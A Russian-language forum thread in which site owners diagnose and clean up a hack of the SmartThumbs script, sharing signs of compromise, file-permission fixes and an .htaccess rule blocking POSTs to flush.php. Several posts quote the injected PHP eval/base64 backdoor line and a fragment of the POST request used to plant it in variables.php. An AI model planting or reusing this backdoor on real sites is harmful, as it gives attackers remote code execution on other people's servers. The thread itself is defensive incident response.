SmartThumbs HACKED again

WeRock писал:

Вобщем как я понимаю, меня тоже поломали? Вопрос, что делать? :-) Ну не удалять же все файлы с domaing#2.com.... Пока ничего не трогал. Могу что-ниубдь "затестить". ЗЫ: Кстати, есть еще два независимых домена на этом же сервере с версиями СТ 5.70 и 5.66 - на них симптомов не обнаружено.

поскольку у тебя старые версии смарта - то и картинка отличается.

проверь .htpasswd, /admin/variables.php - удали эту строчку
из директории /tmp/ удали
install.php тоже можно удалить, т.к. он просто не нужен


classes/php_class.php - это дырка еще с прошлой версии.
можно обнулить этот файл и так же параметры для него сделать нулевыми, чтобы никто к нему доступа не смог получить и перезаписать не смог и выполнить, рут нужен обычно для этого

Цитата:

classes/php_class.php - это дырка еще с прошлой версии.

т.е. он у меня уже был сломан?!?! Где-то можно про это почитать? Не слышал и в новостях на сайте смарттумбса такого не видел...

Цитата:

можно обнулить этот файл и так же параметры для него сделать нулевыми, чтобы никто к нему доступа не смог получить и перезаписать не смог и выполнить, рут нужен обычно для этого

спасибо, так и сделал, обнулил и выставил нулевые права.

Хреновая новость у меня все сайты на СТ

Нашел дырку


Вопрос, файлик /st/admin/variables.php должен иметь права 777 (или иным образом быть доступным для записи вебсервером, например принадлежать пользователю www) ?

WeRock писал:

Не слышал и в новостях на сайте смарттумбса такого не видел...

http://www.askdamagex.com/f2/attention-all-smart-thumbs-users-16660/

zuborg писал:

Вопрос, файлик /st/admin/variables.php должен иметь права 777 (или иным образом быть доступным для записи вебсервером, например принадлежать пользователю www) ?

Это был вопрос автору
Второй вопрос - в POST запросе
key=Dys%3D&action=niche&niche=1 откуда берется значение key ? Его можно высчитать, зная исходники ST ?

zuborg писал:

Нашел дырку Вопрос, файлик /st/admin/variables.php должен иметь права 777 (или иным образом быть доступным для записи вебсервером, например принадлежать пользователю www) ?

ты именно дырку нашел или запечатлел факт взлома?

насчет этого файлика - ну по уму, сам понимаешь, он не должен иметь права 777, но так его выставляет смарттамбс. в этот файл они пишут сеттингсы.

кто-то предложил выставить на него права 444, при этом он не будет писаться вообще, если я понимаю. а если необходимо поменять настройки - то снова менять права на файл. это большой гимор (для меня точно), с другой стороны для безопасности можно временно пойти и на это, пока не сделают фикс.

по поводу пост-запросов и кея - не знаю, тут нужно спрашивать авторов софта. они вроде начали отвечать в том топике на аскдамаге

Цитата:

упс не так понял

fihorn писал:

ты именно дырку нашел или запечатлел факт взлома?

нашел запрос которым в файлике variables.php прописывается строчка
$niche='1';@eval(base64_decode($_POST[qxp]));//';

zuborg: это давно уже нашли.

fihorn писал:

я тоже удалил, т.к. его не должно быть народ не чешется вообще, я погляжу.. в треп что ли запостить..

можешь обьяснить почему его нужно удалить и почему его не должно быть? а то я проверил он есть у всех копиях СТ дата создания совподает с таким файлом calendar.js или в этой папке вообще не должно быть .js файлов?

world-gay-sex писал:

можешь обьяснить почему его нужно удалить и почему его не должно быть? а то я проверил он есть у всех копиях СТ дата создания совподает с таким файлом calendar.js или в этой папке вообще не должно быть .js файлов?

там должен быть
sniffer.js
но не должно быть
sniffer_class.php


а по поводу запроса, которым прописывается строчка - хотел сначала попросить сюда выложить, потом подумал, что не стоит.
как-то заблокировать его можно?

fihorn писал:

как-то заблокировать его можно?

Просто интересно, как взломщик подбирает key
достаточно ли тут имени домена или надо другая секретная информация

Я не знаток ST, непонятно зачем вообще открывать скрипт который меняет глобальные настройки в общий доступ, даже если он "защищен" этим параметром key.
Может запретить на /st/flush.php POST вообще, кроме некоторых ипов ?

нужен не только key, но и token для сверки операции с базой

запрос работает без token вполне успешно, но key для разных доменов разные


вариантов пока вижу два, первы - убрать права разрешающие запись всем на файлик /st/admin/variables.php, обычно стоят права 777 и владелец www впридачу, надо поставить 444

второй - запретить POST-ы на /st/flush.php

я не спец по ST и не знаю чем чреваты оба варианта

признаки взлома:
а) не должно быть левых юзеров в st/admin/.htpasswd
б) не должно быть include и eval в st/admin/variables.php
в) не должно быть php файлов в st/thumbs

кто-то знает ещё четкие признаки ?

zuborg писал:

кто-то знает ещё четкие признаки ?

У меня в variables.php было так

Код:

<? // здесь все нормально как и на других смартах // которые не имеют никаких признаков взлома $md5_check_password=''; $md5_check_url=''; $skim_url=''; $skim_percentage='0.00'; ?> <?$qall=1;?>

а вот на смарте, который имел пустого юзера и php файл в st/thumbs, появился какой-то добавочный параметр в конце <?$qall=1;?>

г) в директоии /tmp/ сервера не должно быть файла ases.tmp

WeRock писал:

г) в директоии /tmp/ сервера не должно быть файла ases.tmp

*ses.tmp

знатоки ST, что может поломать такой st/.htaccess ?

Код:

<Files flush.php>   <Limit POST>     Deny from all   </Limit> </Files>

Soft-Com писал:

/tmp/*ses.tmp

эти файлы заливаются через дырку когда в variables.php строчку

Код:

$niche='1';

меняют на

Код:

$niche='1';@eval(base64_decode($_POST[qxp]));//';

Проверьте плиз у вас встречается в вариаблес параметр <?$qall=1;?> ? Это смартовский параметр или все-таки левый.

Цитата:

Проверьте плиз у вас встречается в вариаблес параметр <?$qall=1;?> ?

у меня нет такого. Похоже на левак.

Нашел у себя эту хрень
еще все клики по тумбам открывают корень домена, админка смарта не показывает что по тумбам кликают, при это логов ошибок крона нет.
Это что за фигня? Вроде все подчистил

Кстати версия смарта была предпоследней, а не последней